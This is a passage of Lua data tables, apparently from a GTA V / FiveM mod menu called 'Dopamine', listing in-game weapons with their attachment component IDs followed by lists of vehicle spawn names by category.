'COMPONENT_ASSAULTSHOTGUN_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, BullpupShotgun = { id = 'weapon_bullpupshotgun', name = '~s~~s~Bullpup Shotgun', bInfAmmo = false, mods = { Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, Musket = { id = 'weapon_musket', name = '~s~~s~Musket', bInfAmmo = false, mods = {} }, HeavyShotgun = { id = 'weapon_heavyshotgun', name = '~s~~s~Heavy Shotgun', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_HEAVYSHOTGUN_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_HEAVYSHOTGUN_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_HEAVYSHOTGUN_CLIP_02' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, DoubleBarrelShotgun = { id = 'weapon_dbshotgun', name = '~s~~s~Double Barrel Shotgun', bInfAmmo = false, mods = {} }, SweeperShotgun = { id = 'weapon_autoshotgun', name = '~s~~s~Sweeper Shotgun', bInfAmmo = false, mods = {} } }, AssaultRifles = { AssaultRifle = { id = 'weapon_assaultrifle', name = '~s~~s~Assault Rifle', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_ASSAULTRIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_ASSAULTRIFLE_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_ASSAULTRIFLE_CLIP_03' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MACRO' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, AssaultRifleMkII = { id = 'weapon_assaultrifle_mk2', name = '~s~~s~Assault Rifle Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_ASSAULTRIFLE_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_MK2' }, { name = '~s~~s~Large Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_AR_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_AR_BARREL_0' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02' } } } }, CarbineRifle = { id = 'weapon_carbinerifle', name = '~s~~s~Carbine Rifle', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_CARBINERIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_CARBINERIFLE_CLIP_02' }, { name = '~s~~s~Box Magazine', id = 'COMPONENT_CARBINERIFLE_CLIP_03' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, CarbineRifleMkII = { id = 'weapon_carbinerifle_mk2', name = '~s~~s~Carbine Rifle Mk II ', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_CARBINERIFLE_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_MK2' }, { name = '~s~~s~Large Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_CR_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_CR_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02' } } } }, AdvancedRifle = { id = 'weapon_advancedrifle', name = '~s~~s~Advanced Rifle ', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_ADVANCEDRIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_ADVANCEDRIFLE_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' } } } }, SpecialCarbine = { id = 'weapon_specialcarbine', name = '~s~~s~Special Carbine', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SPECIALCARBINE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SPECIALCARBINE_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_SPECIALCARBINE_CLIP_03' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, SpecialCarbineMkII = { id = 'weapon_specialcarbine_mk2', name = '~s~~s~Special Carbine Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_SPECIALCARBINE_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_MK2' }, { name = '~s~~s~Large Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_SC_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_SC_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02' } } } }, BullpupRifle = { id = 'weapon_bullpuprifle', name = '~s~~s~Bullpup Rifle', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_BULLPUPRIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_BULLPUPRIFLE_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, BullpupRifleMkII = { id = 'weapon_bullpuprifle_mk2', name = '~s~~s~Bullpup Rifle Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Armor Piercing Rounds', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_BULLPUPRIFLE_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Small Scope', id = 'COMPONENT_AT_SCOPE_MACRO_02_MK2' }, { name = '~s~~s~Medium Scope', id = 'COMPONENT_AT_SCOPE_SMALL_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_BP_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_BP_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, CompactRifle = { id = 'weapon_compactrifle', name = '~s~~s~Compact Rifle', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_COMPACTRIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_COMPACTRIFLE_CLIP_02' }, { name = '~s~~s~Drum Magazine', id = 'COMPONENT_COMPACTRIFLE_CLIP_03' } } } } }, LMG = { MG = { id = 'weapon_mg', name = '~s~~s~MG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MG_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_SMALL_02' } } } }, CombatMG = { id = 'weapon_combatmg', name = '~s~~s~Combat MG', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_COMBATMG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_COMBATMG_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, CombatMGMkII = { id = 'weapon_combatmg_mk2', name = '~s~~s~Combat MG Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_COMBATMG_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_COMBATMG_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_COMBATMG_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_COMBATMG_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_COMBATMG_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_COMBATMG_MK2_CLIP_FMJ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Medium Scope', id = 'COMPONENT_AT_SCOPE_SMALL_MK2' }, { name = '~s~~s~Large Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM_MK2' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_MG_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_MG_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02' } } } }, GusenbergSweeper = { id = 'weapon_gusenberg', name = '~s~~s~GusenbergSweeper', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_GUSENBERG_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_GUSENBERG_CLIP_02' } } } } }, Snipers = { SniperRifle = { id = 'weapon_sniperrifle', name = '~s~~s~Sniper Rifle', bInfAmmo = false, mods = { Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE' }, { name = '~s~~s~Advanced Scope', id = 'COMPONENT_AT_SCOPE_MAX' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP_02' } } } }, HeavySniper = { id = 'weapon_heavysniper', name = '~s~~s~Heavy Sniper', bInfAmmo = false, mods = { Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE' }, { name = '~s~~s~Advanced Scope', id = 'COMPONENT_AT_SCOPE_MAX' } } } }, HeavySniperMkII = { id = 'weapon_heavysniper_mk2', name = '~s~~s~Heavy Sniper Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_02' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Armor Piercing Rounds', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_FMJ' }, { name = '~s~~s~Explosive Rounds', id = 'COMPONENT_HEAVYSNIPER_MK2_CLIP_EXPLOSIVE' } }, Sights = { { name = '~s~~s~Zoom Scope', id = 'COMPONENT_AT_SCOPE_LARGE_MK2' }, { name = '~s~~s~Advanced Scope', id = 'COMPONENT_AT_SCOPE_MAX' }, { name = '~s~~s~Nigt Vision Scope', id = 'COMPONENT_AT_SCOPE_NV' }, { name = '~s~~s~Thermal Scope', id = 'COMPONENT_AT_SCOPE_THERMAL' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_SR_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_SR_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_SR_SUPP_03' }, { name = '~s~~s~Squared Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_08' }, { name = '~s~~s~Bell-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_09' } } } }, MarksmanRifle = { id = 'weapon_marksmanrifle', name = '~s~~s~Marksman Rifle', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MARKSMANRIFLE_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MARKSMANRIFLE_CLIP_02' } }, Sights = { { name = '~s~~s~Scope', id = 'COMPONENT_AT_SCOPE_LARGE_FIXED_ZOOM' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP' } } } }, MarksmanRifleMkII = { id = 'weapon_marksmanrifle_mk2', name = '~s~~s~Marksman Rifle Mk II', bInfAmmo = false, mods = { Magazines = { { name = '~s~~s~Default Magazine', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_01' }, { name = '~s~~s~Extended Magazine', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_02' }, { name = '~s~~s~Tracer Rounds', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_TRACER' }, { name = '~s~~s~Incendiary Rounds', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_INCENDIARY' }, { name = '~s~~s~Hollow Point Rounds', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_ARMORPIERCING' }, { name = '~s~~s~FMJ Rounds', id = 'COMPONENT_MARKSMANRIFLE_MK2_CLIP_FMJ ' } }, Sights = { { name = '~s~~s~Holograhpic Sight', id = 'COMPONENT_AT_SIGHTS' }, { name = '~s~~s~Large Scope', id = 'COMPONENT_AT_SCOPE_MEDIUM_MK2' }, { name = '~s~~s~Zoom Scope', id = 'COMPONENT_AT_SCOPE_LARGE_FIXED_ZOOM_MK2' } }, Flashlight = { { name = '~s~~s~Flashlight', id = 'COMPONENT_AT_AR_FLSH' } }, Barrel = { { name = '~s~~s~Default', id = 'COMPONENT_AT_MRFL_BARREL_01' }, { name = '~s~~s~Heavy', id = 'COMPONENT_AT_MRFL_BARREL_02' } }, BarrelAttachments = { { name = '~s~~s~Suppressor', id = 'COMPONENT_AT_AR_SUPP' }, { name = '~s~~s~Flat Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_01' }, { name = '~s~~s~Tactical Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_02' }, { name = '~s~~s~Fat-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_03' }, { name = '~s~~s~Precision Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_04' }, { name = '~s~~s~Heavy Duty Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_05' }, { name = '~s~~s~Slanted Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_06' }, { name = '~s~~s~Split-End Muzzle Brake', id = 'COMPONENT_AT_MUZZLE_07' } }, Grips = { { name = '~s~~s~Grip', id = 'COMPONENT_AT_AR_AFGRIP_02' } } } } }, Heavy = { RPG = { id = 'weapon_rpg', name = '~s~~s~RPG', bInfAmmo = false, mods = {} }, GrenadeLauncher = { id = 'weapon_grenadelauncher', name = '~s~~s~Grenade Launcher', bInfAmmo = false, mods = {} }, GrenadeLauncherSmoke = { id = 'weapon_grenadelauncher_smoke', name = '~s~~s~Grenade Launcher Smoke', bInfAmmo = false, mods = {} }, Minigun = { id = 'weapon_minigun', name = '~s~~s~Minigun', bInfAmmo = false, mods = {} }, FireworkLauncher = { id = 'weapon_firework', name = '~s~~s~Firework Launcher', bInfAmmo = false, mods = {} }, Railgun = { id = 'weapon_railgun', name = '~s~~s~Railgun', bInfAmmo = false, mods = {} }, HomingLauncher = { id = 'weapon_hominglauncher', name = '~s~~s~Homing Launcher', bInfAmmo = false, mods = {} }, CompactGrenadeLauncher = { id = 'weapon_compactlauncher', name = '~s~~s~Compact Grenade Launcher', bInfAmmo = false, mods = {} }, Widowmaker = { id = 'weapon_rayminigun', name = '~s~~s~Widowmaker', bInfAmmo = false, mods = {} } }, Throwables = { Grenade = { id = 'weapon_grenade', name = '~s~~s~Grenade', bInfAmmo = false, mods = {} }, BZGas = { id = 'weapon_bzgas', name = '~s~~s~BZ Gas', bInfAmmo = false, mods = {} }, MolotovCocktail = { id = 'weapon_molotov', name = '~s~~s~Molotov Cocktail', bInfAmmo = false, mods = {} }, StickyBomb = { id = 'weapon_stickybomb', name = '~s~~s~Sticky Bomb', bInfAmmo = false, mods = {} }, ProximityMines = { id = 'weapon_proxmine', name = '~s~~s~Proximity Mines', bInfAmmo = false, mods = {} }, Snowballs = { id = 'weapon_snowball', name = '~s~~s~Snowballs', bInfAmmo = false, mods = {} }, PipeBombs = { id = 'weapon_pipebomb', name = '~s~~s~Pipe Bombs', bInfAmmo = false, mods = {} }, Baseball = { id = 'weapon_ball', name = '~s~~s~Baseball', bInfAmmo = false, mods = {} }, TearGas = { id = 'weapon_smokegrenade', name = '~s~~s~Tear Gas', bInfAmmo = false, mods = {} }, Flare = { id = 'weapon_flare', name = '~s~~s~Flare', bInfAmmo = false, mods = {} } }, Misc = { Parachute = { id = 'gadget_parachute', name = '~s~~s~Parachute', bInfAmmo = false, mods = {} }, FireExtinguisher = { id = 'weapon_fireextinguisher', name = '~s~~s~Fire Extinguisher', bInfAmmo = false, mods = {} } } }
- Dopamine.trashTables.vehicleCategories = { 'Addon Cars', 'Boats', 'Commercial', 'Compacts', 'Coupes', 'Cycles', 'Emergency', 'Helictopers', 'Industrial', 'Military', 'Motorcycles', 'Muscle', 'Off-Road', 'Planes', 'SUVs', 'Sedans', 'Service', 'Sports', 'Sports Classic', 'Super', 'Trailer', 'Trains', 'Utility', 'Vans' }
- Dopamine.trashTables.vehiclesAddonsList = { '2014rs5', '2016rs7', 'aaq4', 'q820', 'r8v10', 'rs4avant', 'audirs6tk', 'r820', 'rs3', 'rs318', 'sq72016', 'bentayga17', 'contgt13', 'bmci', 'e60', 'm3f80', 'x6m', 'c7', '16challenger', '16chager', '99viper', '95stang', 'mustang19', 'ap2', 'civic', 'tuscani', 'lp670sv', 'gs350', 'lc500', 'rx7tunable', 'amggtr', 'c63s', 'cl65', 'e63amg', 'g65', 'evo10', 'mitsugto', '180sx', '370z', 'gtr', 'evoque', 'subisti08', 'subwrx', 'avalon', 'cam08', 'celisupra', 'gt86', 'supra', 'supra2', 'a80', 'r50' }
- Dopamine.trashTables.vehiclesBoatsList = { 'Dinghy', 'Dinghy2', 'Dinghy3', 'Dingh4', 'Jetmax', 'Marquis', 'Seashark', 'Seashark2', 'Seashark3', 'Speeder', 'Speeder2', 'Squalo', 'Submersible', 'Submersible2', 'Suntrap', 'Toro', 'Toro2', 'Tropic', 'Tropic2', 'Tug' }
- Dopamine.trashTables.vehiclesTruckList = { 'Benson', 'Biff', 'Cerberus', 'Cerberus2', 'Cerberus3', 'Hauler', 'Hauler2', 'Mule', 'Mule2', 'Mule3', 'Mule4', 'Packer', 'Phantom', 'Phantom2', 'Phantom3', 'Pounder', 'Pounder2', 'Stockade', 'Stockade3', 'Terbyte' }
- Dopamine.trashTables.vehiclesCompactsList = { 'Blista', 'Blista2', 'Blista3', 'Brioso', 'Dilettante', 'Dilettante2', 'Issi2', 'Issi3', 'issi4', 'Iss5', 'issi6', 'Panto', 'Prarire', 'Rhapsody' }
- Dopamine.trashTables.vehiclesCoupesList = { 'CogCabrio', 'Exemplar', 'F620', 'Felon', 'Felon2', 'Jackal', 'Oracle', 'Oracle2', 'Sentinel', 'Sentinel2', 'Windsor', 'Windsor2', 'Zion', 'Zion2' }
- Dopamine.trashTables.vehiclesBicyclesList = { 'Bmx', 'Cruiser', 'Fixter', 'Scorcher', 'Tribike', 'Tribike2', 'tribike3' }
- Dopamine.trashTables.vehiclesEmergencyList = { 'ambulance', 'FBI', 'FBI2', 'FireTruk', 'PBus', 'police', 'Police2', 'Police3', 'Police4', 'PoliceOld1', 'PoliceOld2', 'PoliceT', 'Policeb', 'Polmav', 'Pranger', 'Predator', 'Riot', 'Riot2', 'Sheriff', 'Sheriff2' }
- Dopamine.trashTables.vehiclesHelicoptersList = { 'Akula', 'Annihilator', 'Buzzard', 'Buzzard2', 'Cargobob', 'Cargobob2', 'Cargobob3', 'Cargobob4', 'Frogger', 'Frogger2', 'Havok', 'Hunter', 'Maverick', 'Savage', 'Seasparrow', 'Skylift', 'Supervolito', 'Supervolito2', 'Swift', 'Swift2', 'Valkyrie', 'Valkyrie2', 'Volatus' }
- Dopamine.trashTables.vehiclesIndustrialsList = { 'Bulldozer', 'Cutter', 'Dump', 'Flatbed', 'Guardian', 'Handler', 'Mixer', 'Mixer2', 'Rubble', 'Tiptruck', 'Tiptruck2' }
- Dopamine.trashTables.vehiclesMilitaryVehicles = { 'APC', 'Barracks', 'Barracks2', 'Barracks3', 'Barrage', 'Chernobog', 'Crusader', 'Halftrack', 'Khanjali', 'Rhino', 'Scarab', 'Scarab2', 'Scarab3', 'Thruster', 'Trailersmall2' }
